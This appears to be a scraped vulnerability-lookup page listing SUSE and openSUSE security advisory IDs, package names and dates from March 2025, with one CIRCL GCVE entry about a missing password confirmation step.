ts-2024-004	TS-2024-004
ts-2024-003	TS-2024-003
ts-2024-002	TS-2024-002
ts-2024-001	TS-2024-001
ts-2023-009	TS-2023-009
ts-2023-008	TS-2023-008
ts-2023-007	TS-2023-007
ts-2023-006	TS-2023-006
ts-2023-005	TS-2023-005
ts-2023-004	TS-2023-004
ts-2023-003	TS-2023-003
ts-2023-002	TS-2023-002
ts-2023-001	TS-2023-001
ts-2022-005	TS-2022-005
ts-2022-004	TS-2022-004
ts-2022-003	TS-2022-003
ts-2022-002	TS-2022-002

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
suse-su-2025:1032-1	Security update for microcode_ctl	2025-03-26T14:22:25Z	2025-03-26T14:22:25Z
suse-su-2025:1029-1	Security update for ed25519-java	2025-03-26T13:11:18Z	2025-03-26T13:11:18Z
suse-su-2025:1028-1	Security update for proftpd	2025-03-26T12:50:07Z	2025-03-26T12:50:07Z
suse-su-2025:1027-1	Security update for the Linux Kernel	2025-03-26T12:12:05Z	2025-03-26T12:12:05Z
suse-su-2025:1026-1	Security update for php7	2025-03-26T11:30:47Z	2025-03-26T11:30:47Z
suse-su-2025:1025-1	Security update for php7	2025-03-26T11:30:00Z	2025-03-26T11:30:00Z
suse-su-2025:1024-1	Security update for tomcat10	2025-03-26T11:29:12Z	2025-03-26T11:29:12Z
suse-su-2025:1023-1	Security update for webkit2gtk3	2025-03-26T11:28:46Z	2025-03-26T11:28:46Z
suse-su-2025:1022-1	Security update for apache-commons-vfs2	2025-03-26T11:28:34Z	2025-03-26T11:28:34Z
suse-su-2025:1019-1	Security update for azure-cli-core	2025-03-26T10:27:40Z	2025-03-26T10:27:40Z
suse-su-2025:1018-1	Security update for buildah	2025-03-26T09:03:07Z	2025-03-26T09:03:07Z
suse-su-2025:1017-1	Security update for buildah	2025-03-26T09:02:54Z	2025-03-26T09:02:54Z
suse-su-2025:1014-1	Security update for buildah	2025-03-25T13:05:55Z	2025-03-25T13:05:55Z
suse-su-2025:1013-1	Security update for govulncheck-vulndb	2025-03-25T12:47:48Z	2025-03-25T12:47:48Z
suse-su-2025:1012-1	Security update for php8	2025-03-25T12:47:30Z	2025-03-25T12:47:30Z
suse-su-2025:1011-1	Security update for grafana	2025-03-25T11:44:29Z	2025-03-25T11:44:29Z
suse-su-2025:1010-1	Security update for grafana	2025-03-25T11:44:15Z	2025-03-25T11:44:15Z
suse-su-2025:1009-1	Security update for grafana	2025-03-25T11:44:03Z	2025-03-25T11:44:03Z
suse-su-2025:1008-1	Security update for python-gunicorn	2025-03-25T11:09:00Z	2025-03-25T11:09:00Z
suse-su-2025:1007-1	Security update for helm	2025-03-25T08:44:44Z	2025-03-25T08:44:44Z
suse-su-2025:1006-1	Security update for google-osconfig-agent	2025-03-25T08:44:10Z	2025-03-25T08:44:10Z
suse-su-2025:1005-1	Security update for google-guest-agent	2025-03-25T08:43:34Z	2025-03-25T08:43:34Z
suse-su-2025:1004-1	Security update for python-Jinja2	2025-03-25T08:42:43Z	2025-03-25T08:42:43Z
suse-su-2025:1003-1	Security update for libxslt	2025-03-25T08:42:08Z	2025-03-25T08:42:08Z
suse-su-2025:1002-1	Security update for python-gunicorn	2025-03-25T08:41:39Z	2025-03-25T08:41:39Z
suse-su-2025:0998-1	Security update for freetype2	2025-03-25T02:07:21Z	2025-03-25T02:07:21Z
suse-su-2025:0994-1	Security update for php8	2025-03-24T15:11:07Z	2025-03-24T15:11:07Z
suse-su-2025:0993-1	Security update for webkit2gtk3	2025-03-24T14:33:32Z	2025-03-24T14:33:32Z
suse-su-2025:0992-1	Security update for docker	2025-03-24T14:31:39Z	2025-03-24T14:31:39Z
suse-su-2025:0991-1	Security update for rsync	2025-03-24T13:56:41Z	2025-03-24T13:56:41Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
opensuse-su-2025:14932-1	qubesome-0.0.10-1.1 on GA media	2025-03-26T00:00:00Z	2025-03-26T00:00:00Z
opensuse-su-2025:14931-1	icingacli-2.12.4-1.1 on GA media	2025-03-26T00:00:00Z	2025-03-26T00:00:00Z
opensuse-su-2025:14930-1	git-bug-0.8.0+git.1742269202.0ab94c9-1.1 on GA media	2025-03-26T00:00:00Z	2025-03-26T00:00:00Z
opensuse-su-2025:14929-1	apache-commons-vfs2-2.10.0-1.1 on GA media	2025-03-26T00:00:00Z	2025-03-26T00:00:00Z
opensuse-su-2025:14928-1	libmbedcrypto7-2.28.10-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14927-1	kubernetes1.32-apiserver-1.32.3-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14926-1	kubernetes1.31-apiserver-1.31.7-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14925-1	kubernetes1.30-apiserver-1.30.11-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14924-1	kubernetes1.29-apiserver-1.29.15-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14923-1	docker-stable-24.0.9_ce-8.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14922-1	chromedriver-134.0.6998.117-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14921-1	argocd-cli-2.14.8-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:0103-1	Security update for cadvisor	2025-03-24T17:01:45Z	2025-03-24T17:01:45Z
opensuse-su-2025:14920-1	gitleaks-8.24.2-1.1 on GA media	2025-03-24T00:00:00Z	2025-03-24T00:00:00Z
opensuse-su-2025:14919-1	forgejo-10.0.3-1.1 on GA media	2025-03-24T00:00:00Z	2025-03-24T00:00:00Z
opensuse-su-2025:0101-1	Security update for radare2	2025-03-23T15:01:53Z	2025-03-23T15:01:53Z
opensuse-su-2025:0098-1	Security update for chromium	2025-03-22T10:55:25Z	2025-03-22T10:55:25Z
opensuse-su-2025:14918-1	warewulf4-4.6.0-2.1 on GA media	2025-03-21T00:00:00Z	2025-03-21T00:00:00Z
opensuse-su-2025:14917-1	nodejs-electron-33.4.6-1.1 on GA media	2025-03-21T00:00:00Z	2025-03-21T00:00:00Z
opensuse-su-2025:0094-1	Security update for gitea-tea	2025-03-20T13:01:19Z	2025-03-20T13:01:19Z
opensuse-su-2025:14916-1	xorg-x11-server-21.1.15-3.1 on GA media	2025-03-20T00:00:00Z	2025-03-20T00:00:00Z
opensuse-su-2025:14915-1	tomcat10-10.1.39-1.1 on GA media	2025-03-20T00:00:00Z	2025-03-20T00:00:00Z
opensuse-su-2025:14914-1	python311-joblib-1.4.2-2.1 on GA media	2025-03-20T00:00:00Z	2025-03-20T00:00:00Z
opensuse-su-2025:14913-1	python311-Django-5.1.7-1.1 on GA media	2025-03-20T00:00:00Z	2025-03-20T00:00:00Z
opensuse-su-2025:14912-1	mercurial-6.9.4-1.1 on GA media	2025-03-20T00:00:00Z	2025-03-20T00:00:00Z
opensuse-su-2025:14911-1	tomcat-9.0.102-1.1 on GA media	2025-03-19T00:00:00Z	2025-03-19T00:00:00Z
opensuse-su-2025:14910-1	govulncheck-vulndb-0.0.20250318T181448-1.1 on GA media	2025-03-19T00:00:00Z	2025-03-19T00:00:00Z
opensuse-su-2025:14909-1	apptainer-1.3.6-5.1 on GA media	2025-03-19T00:00:00Z	2025-03-19T00:00:00Z
opensuse-su-2025:14908-1	python311-Django4-4.2.20-1.1 on GA media	2025-03-18T00:00:00Z	2025-03-18T00:00:00Z
opensuse-su-2025:14907-1	kured-1.17.1-1.1 on GA media	2025-03-18T00:00:00Z	2025-03-18T00:00:00Z

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS	Description	Vendor	Product	Published	Updated
gcve-1-2025-0001	5.3 (v4.0)	The absence of a password confirmation step when deact…	CIRCL	Vulnerability-Lookup	2025-05-27T08:58:00.000Z	2025-05-30T14:27:56.273945Z